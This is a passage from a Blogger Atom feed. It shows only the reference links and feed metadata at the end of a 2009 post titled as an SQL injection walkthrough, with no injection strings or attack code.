href="http://www.wiretrip.net/rfp/p/doc.asp?id=7&amp;amp;iface=6"&gt;http://www.wiretrip.net/rfp/p/doc.asp?id=7&amp;amp;iface=6&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.wiretrip.net/rfp/p/doc.asp?id=60&amp;amp;iface=6"&gt;http://www.wiretrip.net/rfp/p/doc.asp?id=60&amp;amp;iface=6&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf"&gt;http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4057913628507130739-6259028680184418569?l=stupidsignal.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://stupidsignal.blogspot.com/feeds/6259028680184418569/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4057913628507130739&amp;postID=6259028680184418569' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/6259028680184418569'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4057913628507130739/posts/default/6259028680184418569'/><link rel='alternate' type='text/html' href='http://stupidsignal.blogspot.com/2009/03/about-sql-injection-walktrough.html' title='AbouT SQL - INJECTION WALKTROUGH'/><author><name>STupID SigNaL</name><uri>http://www.blogger.com/profile/02211733191185843456</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_8X-oMz8K51A/Sbvne1oqRZI/AAAAAAAAAAM/ZBo0MDU82jM/S220/Farel.jpg'/></author><thr:total>0</thr:total></entry></feed>
